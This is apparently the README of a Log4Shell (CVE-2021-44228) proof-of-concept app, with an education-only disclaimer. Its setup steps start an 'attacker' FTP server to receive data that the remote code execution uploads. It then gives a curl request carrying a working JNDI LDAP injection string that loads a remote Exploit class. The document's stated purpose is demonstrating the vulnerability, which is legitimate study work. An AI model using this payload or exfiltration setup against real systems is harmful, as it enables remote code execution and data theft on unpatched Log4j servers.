log4jshell is an full fledged POC that exploit LOG4J vulnerability CVE-2021-44228 introduced as part of LOG4J2-313
NOTE :
PLEASE USE THIS APP ONLY FOR EDUCATION PURPOSE.
THIS APP IS DEVELOPED AS A PROOF OF CONCEPT(POC) AND IS INTENTEDED ONLY FOR EDUCATION PURPOSE.
USING THIS POC APP TO TARGET AGAINST ANY SYSTEMS WITHOUT CONSENT IS PURELY ILLEGAL.
ANY DAMAGES CAUSED DUE TO ILLEGAL USE OF THIS APP/SOFTWARE/POC IS NOT THE RESPONSIBILITY OF THE AUTHOR.
Use the python package manager pip3 to install foobar.
pip3 install pyftpdlibCreate the FTP upload directory where the RCE will upload the information
mkdir -p /tmp/ftpuploadsStart the FTP Server locally
python3 src/main/python/attacker/ftp-server.pycurl --location --request GET 'http://localhost:8080/log4jshell/search' \
--header 'Content-Type: application/json' \
--data-raw '{
"searchText" : "${jndi:ldap://localhost:8389/com.demo.exploit.log4jshell.attacker.payload.Exploit.class}"
}
'Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
Please make sure to update tests as appropriate.
Some of the references code that I have used to build this POC are listed below
